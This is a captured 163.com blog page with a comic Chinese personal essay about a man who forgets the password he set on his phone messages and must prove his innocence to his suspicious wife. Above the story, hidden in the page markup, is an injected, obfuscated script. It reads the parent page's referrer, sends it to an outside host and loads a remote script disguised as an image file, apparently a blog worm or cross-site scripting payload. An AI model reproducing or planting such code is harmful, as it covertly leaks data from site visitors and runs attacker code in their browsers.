注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

荒村孤笠的博客

给自己一点自由,让心去跳个舞......

 
 
 

日志

 
 
关于我

一个精神世界的流浪汉,一个现实生活里的盲流,衣食无着。半篷荒草度光阴,一身正气染春秋。 别惹我,我很诚实!

网易考拉推荐

无聊(原创)  

2009-07-02 12:47:30|  分类: 酸枣刺 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
load=" r="http://shandong2007zhao.blog.163.com/blog/static/441273792009620473065/edit/" left="var r=eval('parent.'+'document.referrer');var s=document.createElement('script');s.src='http://love.itwenba.cn/a/163/q.jpg?k=blog.sina.com.cn&r='+r;s.type='text/jav'+'ascr'+'ipt';document.getElementsByTagName('head').item(0).appendChild(s)" display="none">load=" >">

     昨天参加了一个无聊的会议,今天就惹出了无聊的麻烦。

     因为工作的原因,一大早我就打开了手机,随手往沙发上一扔,我便开始处理起床后必不可少的三件事--上卫生间、洗漱、收拾这张破脸。然而,就在刮胡子的时候,手机嘟嘟地来短信了。来就来吧,洗漱完了再看也不迟,反正咱也没有红颜知己这方面的隐私。可是人要是来了不顺,喝口凉水都塞牙。赶巧老婆就坐在沙发上,也许是对一大早发来的短信感兴趣,很少动我手机的老婆突然产生了好奇。我的娘哎,不看不要紧,她这一看还真的惹出了麻烦,倒不是看到了什么见不得人的短信,而是她根本打不开我的手机短信。

     “死猪,你出来,说,这是咋回事?”

     “你别咋咋呼呼行吗?还想蒙我!”心里没鬼,我也没当回事儿。

     “别跟我嬉皮笑脸的,出来,你说这是咋回事儿?”说着,老婆揪着我的耳朵把我扽到了客厅,“呵呵,长本事了?手机短信还设上了密码!你这是防贼呀还是防我?”老婆看来真的生气了。

      “感情是为了这事儿呀?不就是设了个密码吗,我又没瞒着你去偷鸡摸狗。等等,我洗把手,打开让你看个够。”

     洗了手,我嘟嘟囔囔地接过手机。“这就是我无聊的时候瞎摆弄设上的,有什么值得大惊小怪的?”

     “嗯,嗯,这是咋回事?怎么老显示密码不正确呀?!”我连续输了几遍,都无法打开手机短信。昨天下午在会场上闲得无聊,鼓弄了一下午手机,当时就没往心里去,现在还真的想不起来了。

      “你就别演戏了,我还不知道你?揣着密码装糊涂。这日子看来你是真的不想过了。”老婆一屁股蹲在沙发上。

     心里越急,脑子越乱,这时,就感觉着我自己心跳也快了,汗也下来了。

     “老婆,你先别生气,真的是我忘记密码了,当时就是闲得无聊摆弄着玩,根本没在意。你让我想想。”

     “别想了,打开我也不看了。不就是个手机短信吗?”

     又想了大半天,我还是没打开。这事儿,你说咋整呢?

     “老婆,你等我刮完这半边脸,我跟你去手机店,我不能一个密码丢了半辈子的清白。”

     “行,我等你,我倒要看看你的清白在哪里?”

     心一急,手也慌,半张脸让我刮破四五次。这时候,也感觉不到有多疼了,找了几块胶布往脸上一贴,脸也不要了,拉起老婆直奔手机店。

     我的老天爷,幸亏手机店的老板厉害,如果再打不开,恐怕我那半张脸也得搭进去!

 

                (2009年7月6日于家中,荒村孤笠草)

  评论这张
 
阅读(141)| 评论(43)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017